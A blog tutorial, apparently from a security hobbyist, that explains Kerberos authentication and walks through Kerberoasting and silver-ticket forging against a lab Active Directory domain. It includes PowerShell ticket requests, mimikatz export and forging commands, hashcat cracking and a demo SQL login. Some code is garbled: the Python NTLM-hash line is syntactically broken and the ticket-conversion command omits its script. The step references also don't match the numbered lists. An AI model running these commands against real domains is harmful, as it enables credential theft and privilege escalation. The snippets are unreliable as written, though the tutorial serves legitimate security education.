Kerberoasting and Silver Tickets

Kerberoasting is an attack allowing an attacker to crack Active Directory (AD) service account passwords offline, and with no fear of detection. 

Developed by Tim Medin, Kerberoasting relies on the fact that when an AD user requests access to a service, they receive back a Kerberos ticket signed with the NTLM hash of the account running the service, which an attacker can steal — even if they are a regular domain user — and crack elsewhere.

With that service account password in hand, one can then forge a “silver ticket” for that service, creating opportunities for privilege escalation.

MS Kerberos

MS Kerberos handles requests for access to network services and resources by issuing users an initial authentication token, the ticket-granting ticket (TGT), and then issuing session keys for access to specific resources as they’re requested. 

Step-by-step, when a user authenticates to the domain:

  1. They send their credentials to the domain controller (DC)
  2. The DC validates the credentials, checks the user information group membership and login restrictions, then sends the client a ticket-granting ticket (TGT), which is encrypted and signed. Only the Kerberos service can open and read the TGT.
  3.  The client session manager will store the TGT and request a new one whenever the old one expires
Graphic showing the initial process of authentication to a Microsoft Active Directory domain via Kerberos
Figure 1 – Initial Kerberos authentication process

Then, when a user requests access to a particular resource or service:

  1. The client sends the TGT to the DC, with the Service Principle Name (SPN) of the resource it wants to access
  2. The DC validates the TGT (which, again, only it can open) and if opens and has a valid checksum, copies the data from the TGT into the new Ticket Granting Service (TGS) ticket. The TGS is encrypted with the NTLM password hash of the requested service, and sent back to the client.
  3. The client forwards the new TGS to the service it’s trying to access, which decrypts the ticket using its NTLM password hash. The service validates the TGS, typically without contacting the DC again.
Graphic showing the process of requesting access to a network service or resource via MS Kerberos
Figure 2 – Kerberos service access request

Kerberoasting attacks step 5 of this process, while silver tickets attack step 6.

Given that the TGS is encrypted with the NTLM hash of the requested service, when extracted from the kerberos service with a tool like Mimikatz, it can be copied off-line and cracked with brute-force tools such as John the Ripper or hashcat.

Once an attacker has cracked the password for the service, they can use that password to create a new, forged TGS, which the target service will accept as valid, the so-called “silver ticket”.


Any domain user can request TGSs, making kerberoasting and silver tickets a useful way to escalate privileges. Tim Medin’s original kerberoasting toolkit contains both a PowerShell and a VisualBasic script for identifying SPNs, either “GetUserSPNs.ps1” or “GetUserSPNs.vbs”

Running the GetUserSPNs.ps1 command to get Service Principle Names

In this case, the target SPN is MSSQLSvc/2016-server.isb.lab.local:1433

Once you have the SPN, you can request a TGS with a couple of lines of PowerShell

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList ‘MSSQLSvc/2016-server.isb.lab.local:1433’
Requesting a TGS with an SPN

Now we can run a single mimikatz command to capture the kerberos tickets

kerberos::list /export
Exporting kerberos tickets with mimikatz

Copy the TGS off the compromised machine, run it through the tool (also in Tim’s toolkit), which will get it into a format either John or hashcat can handle.

jmpalk@kali:~/chaocloud/bloodhound/kerberoast$ python3 1-40a10000-stpr-1138@MSSQLSvc~2016-server.isb.lab.local~1433-ISB.LAB.LOCAL.kirbi > mssql.txt 

tickets written: 1

Converting the ticket exported from mimikatz to one that john and hashcat can read

Then run it through hashcat

.\hashcat.exe -m 13100 -a 0 Z:\bloodhound\kerberoast\mssql.txt .\example.dict -O
Password cracked with hashcat

And there’s the cracked password ‘P4ssword123’.

Silver Tickets

With the password for the service account in hand, we need to get the NTLM hash for that password. This can be done with three lines of python (all credit to TrustedSec for this)

jmpalk@kali:~/chaocloud/bloodhound/kerberoast$ python3

Python 3.8.4 (default, Jul 13 2020, 21:16:07)
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import hashlib,binascii
>>> hash ='md4', "P4ssword123".encode('utf-16le')).digest()
>>> print(binascii.hexlify(hash))
>>> b'c1fc37edabedb382c5141e88ce614b11'

With the NTLM hash, we then return to the compromised machine.

We also need the Domain SID, which can be obtained by running the command

whoami /user
getting Domain SID with whoami /user

We also need the target host and port, and the name of a service running as the service account we compromised. In this case, that’s 2016-server.isb.lab.local:1433, and MSSQLSvc. Now for the fun part: remember how the service doesn’t typically check back with the Domain Controller when it receives a ticket that’s been encrypted with its password? We can control the user the ticket is written for and the groups in the Privileged Attribute Certificate (PAC). We can specify any user we like for the ticket, including a user who doesn’t even exist. And, by default, mimikatz adds the Domain Admins group, although you can override this, if you wish.

The mimikatz command is:

kerberos::golden /sid:S-1-5-21-1247694514-2056305760-2497134065 /domain:isb.lab.local /ptt /id:1604 /target:2016-server.isb.lab.local:1433 /service:MSSQLSvc /rc4:c1fc37edabedb382c5141e88ce614b11 /user:ObiWan

If you run ‘klist’ after exiting mimikatz, you will see your new kerberos ticket for the target server and resource in the cache.

generating the ticket in mimikatz

And if you’ve assigned the ticket either the user ID or a group membership with access to the SQL server, you can use the ticket to log in to that server. For purposes of this demo, I configured the SQL server to permit logins by Domain Admins, which is one of the default groups mimikatz will assign to the ticket.

klist and logging into the compromised server with sqlcmd



Author: TheKilt

Information Security, Cosmic Horror, Gaming, Homebrewing, BBQ

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: